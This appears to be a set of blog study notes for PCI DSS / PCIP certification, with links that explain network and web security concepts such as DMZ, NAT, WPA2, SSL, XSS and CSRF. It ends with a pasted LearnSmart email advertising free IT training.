Study Material - Some web explanations

Sometimes it helps to get a second explanation or description of things.  Here are some:

Requirements 1.1.3, 1.3.1, 1.3.2, 1.3.4  DMZ
http://searchsecurity.techtarget.com/definition/DMZ

Requirement 1.3.6  Stateful Inspection
http://kb.kerio.com/product/kerio-control/firewall-packet-filtering/what-is-stateful-packet-inspection-429.html

Requirement 1.3.8  Network Address Translation (NAT)
http://www.cisco.com/en/US/tech/tk648/tk361/technologies_q_and_a_item09186a00800e523b.shtml

Requirement 1.3.8  Proxy Servers
http://whatismyipaddress.com/proxy-server

Requirement 2.1, 2.1.1  Simple Network Management Protocol (SNMP)
http://compnetworking.about.com/od/networkprotocols/g/snmp-management-protocol.htm

Requirement 2.1.1  Wired Equivalent Privacy (WEP)
Note:  This encryption technique is not secure.

http://searchsecurity.techtarget.com/definition/Wired-Equivalent-Privacy

Requirement 2.1.1 Wi-Fi Protected Access version 2 (WPA2)
http://www.computerworld.com/s/article/9002706/Tutorial_How_to_set_up_WPA2_on_your_wireless_network_

Requirement 2.2  Industry accepted standard organizations

Center for Internet Security (CIS)
http://www.cisecurity.org/

International Organization for Standardization (ISO)
http://www.iso.org/iso/home.html

SysAdmin Audit Network Security (SANS)
http://www.sans.org/

National Institute of Standards Technology (NIST)
http://www.nist.gov/

Requirement 2.2.1  Domain Name Servers (DNS)
http://www.howstuffworks.com/dns.htm

Requirement 2.2  Secure Shell (SSH)
https://kimmo.suominen.com/docs/ssh/

Requirement 2.2  Secure File Transfer Protocol (S-FTP)
http://kb.iu.edu/data/akqg.html

Requirement 2.2  Secure Sockets Layer (SSL)
https://www.ssllabs.com/projects/rating-guide/

Requirement 2.2  IP Security Encryption (IPSec)
 http://www.cisco.com/en/US/tech/tk583/tk372/technologies_tech_note09186a0080094203.shtml#intro

Requirement 6.5.7  Cross Site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29

Requirement 6.5.9  Cross Site Request Forgery (CSRF)
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29

Requirement 12.3.2  Token
http://searchsecurity.techtarget.com/definition/security-token

Study Material - SDLC

The Systems Development Life Cycle (SDLC) is a commonly used "methodology" for creating applications and systems.

The SDLC steps vary depending on who you talk to but they usually involve a lot of the same steps:  initiation/planning, analysis, design, develop/test, implement, maintenance/support.

PCI DSS requirement 6.3 addresses secure application development, commonly called "S-SDLC".

Microsoft has some useful info on this to show how security should be integrated into software development [HERE]

Study Material - Cisco Perspective

Cisco has developed products to assist with PCI Compliance.  They've clearly jumped on the bandwagon.

Here is a good one page visual on "network segmentation"

And another one on mapping Cisco products to PCI Wireless Compliance

Study Questions - A quick, simple test

Here is a simple 10 question security quiz.

When done, it will provide you with a score and explain the correct answers.

You can find it [HERE]

Study Material - SSL

Symantec published a free 8 page guide to SSL called the BEGINNER’S GUIDE TO SSL CERTIFICATES

To access this, you will need to enter your contact info. here is the [LINK]

Obviously there will be some company marketing info included, but there is substantial general info as well.

Study Material - Hmmm. never thought about RAT's

Actually, I've never thought about "sextortion" either.

Hell, I would have never guessed that such a thing existed.

Regardless of what I think, heres an article on remote-access tools (RATs) and "camjacking". "sextortion"

I'm wondering if the exam will this level of breadth, although Security+ does address RAT's

Study Material: Free Security (and other) Training

I just received this email today.

I signed up and started some Security+ training.

Although this is not directly related to PCIP, the security concepts would provide a lot of value.

Finally, I should note that I am in no way affiliated with this organization and it provides no value to me whether you use them or not.

1-800-418-6789 | United Kingdom: (0) 20 8816 8036 International: +1 813-769-0920 Same LearnSmart Training. Now Free. Everything you've become accustomed to with IT and Certification Training has changed! You no longer have to spend thousands to understand the latest technologies or get a leg up on your career. Today marks a new era in how you get training. Starting today, LearnSmart training is now FREE. Hundreds of hours of IT and Career skills training are now at your fingertips along with the most talked about learning management system in the industry - all for FREE. Get FREE access to LearnSmart including: ·   Vibrant and complete training courses ·   The most respected and accomplished instructors ·   The widest variety of e-Learning media and courseware ·   Five-star customer support ·   No commitment and no charges or fees Don’t just try us out... take advantage of us. This isn’t a trial or a demo, we’re handing you the keys. Welcome to the family, come on in and put your feet up. Get the training you need... for Free. The world of IT training has changed. Get the same LearnSmart training, now for Free. Same LearnSmart Training. Now Free. Start Now. Classroom in the Cloud LearnSmart is the first LMS of its kind that’s designed to go where you go, and to be compatible with all of your mobile devices. Of course you can sit at a desk (or your kitchen table) and train on your laptop, but that’s so 2002. With the LearnSmart Theater you can train in your favorite coffeehouse on your tablet or on the bus with your smartphone. If you’re really committed you can even train at a long red light! (Be careful!) With LearnSmart, your training is truly portable, allowing you to make the most of your time – wherever you spend it. LearnSmart Video Training is 100% cloud-based training, so you know the content is always up to date and you can use it anywhere. Each course is brought to you by industry experts who know the facts and the practical application of your course better than anyone. Learning is simple fast and fun with the LearnSmart Theater. It’s easy to navigate, fully-featured and comes complete with supplemental training options you’ll find nowhere else. We’ve changed everything. See for yourself. Your Info, Your Schedule Taking notes is one of the most effective ways of retaining information. The LearnSmart system allows students to keep track of key facts in a virtual notebook. Users can sort their notes by course, or by date, making it simpler to review the material before taking their final exam. The My Notes section is also a good spot to help you keep track of the courses you’re taking – including dates of certification exams, etc. While your notes are, of course, your personal take on the material presented, they can also be a helpful teaching aid for your fellow students. By presenting your unique version of the coursework – and flipping through another pupil’s rendition of the same – you get an extra opportunity to catch what you might have missed, and to look at things in a new way. Since not everyone takes away the same benefit or key information from a lesson, it can go a long way toward improving your understanding when you and a study buddy are able to compare notes. Connect With Us Remember to follow our blog and connect with us on your favorite social networks to stay up-to-date with eLearning, IT and Certification Testing, and technology news in general. Enterprise Training from LearnSmart To discuss training solutions for your organization, please contact a LearnSmart representative at 1-800-418-6789.

1300 N. Westshore Blvd. Ste 125 | Tampa, FL 33607 | © 2013 LearnSmart | All rights reserved. Leave LearnSmart | Speak to a Representative Use Agreement | Return Policy | Pass Guarantee | Privacy Policy